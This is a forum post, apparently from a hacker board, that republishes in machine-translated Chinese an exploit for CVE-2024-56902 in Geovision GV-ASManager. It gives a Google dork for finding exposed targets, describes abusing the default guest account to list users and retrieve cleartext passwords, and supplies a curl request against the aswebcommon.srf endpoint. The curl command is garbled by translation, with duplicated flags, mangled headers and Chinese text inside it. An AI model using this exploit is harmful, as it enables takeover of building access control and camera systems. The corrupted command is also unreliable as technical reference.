H

Geovision GV -Asmanager 6.1.0.0-信息披露

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用title: Geovision GV-Asmanager中的信息披露
#Google Dork: inurl:'asweb/login'
#日期: 02-FEB-2025
#利用作者: Giorgi Dograshvili [Dragown]
#供应商HomePage3360 https://www.geovision.com.tw/
#软件link: https://www.geovision.com.tw/download/product/
#版本: 6.1.0.0或更少
#在: Windows 10上测试| Kali Linux
#CVE : CVE-2024-56902
#POC: https://github.com/DRAGOWN/CVE-2024-56902
Geovision GV-Asmanager Web应用程序中具有v6.1.0.0或以下版本的信息披露漏洞。
要求
要进行成功攻击,攻击者需要:
  • Geovision Asmanager版本6.1.0.0或更少
  • 网络访问GV-ASMANAGER Web应用程序(在某些情况下,有公共访问)
  • 访问访客帐户(默认为启用)或任何低特权帐户(用户名:访客;密码:空白)
影响
可以利用漏洞执行以下未经授权的操作:
一个低特权帐户能够:
  • 列举用户帐户
  • 检索GV-ASMANAGER中任何帐户的Clearext密码。
重复使用已检索的密码后,攻击者将能够到:
  • 访问诸如监视摄像机,访问卡,停车车,员工和访客等资源等资源。
  • 对数据和服务网络配置进行更改,例如员工,访问卡安全信息,IP地址和配置等。
  • 破坏和断开连接服务,例如监视摄像机,访问控件。
  • 克隆和重复的访问控制数据,以进行进一步的攻击方案。
  • 在组织的其他数字资产中重复使用密码。
卷曲脚本:
curl -path -as -is -is -i -s -k -k -x $'post'\
-h $'host: [set-target]'-h $'content-length : 41'-h $'sec-ch-ua-platform: \'linux \'linux \'''-h $'x-requested-with:-with: xmlhttprequest xmlhttprequest'xmlhttprequest'-h $ h $'covcept-language-language-language 3333333333333333: $'sec-ch-ua: \'not?a_brand \'; v=\'99 \',\'chromium \'; v=\'130 \'''-H $ h $'content-type:应用程序/x-wwwwwwww-form-urlencoded; charset=utf-8'-h $'sec-ch-ua-mobile:0'-h $'user-agent: mozilla/5.0(Windows nt 10.0; win64; win64; x64; x64; x64; x64; x64)applewebkit/537.36(khtml,例如ghtml,例如Gecko) $'ACCEPT: /'-h $'起源: 3https://192.168.50.129'-h $'sec-fetch-site : same-origin'-h $ h $'sec-fetch-mode: cors'-h $ h $' -h $'PRISISITY: U=1,I' -H $'CONNECTIN3: keep -alive'\
-b $'[set -cookie-写'cookie:']'\之后的内容
-data-binary $'action=ua_getalluseraccountnode=xnode-98'\
$'[set-target]/asweb/bin/aswebcommon.srf'
成功攻击后,您将访问:
- ASWEB-访问安全管理
-taweb-时间和出勤管理
-VMWEB-访客管理
- ASMANAGER- OS中的访问安全管理软件
 
后退
顶部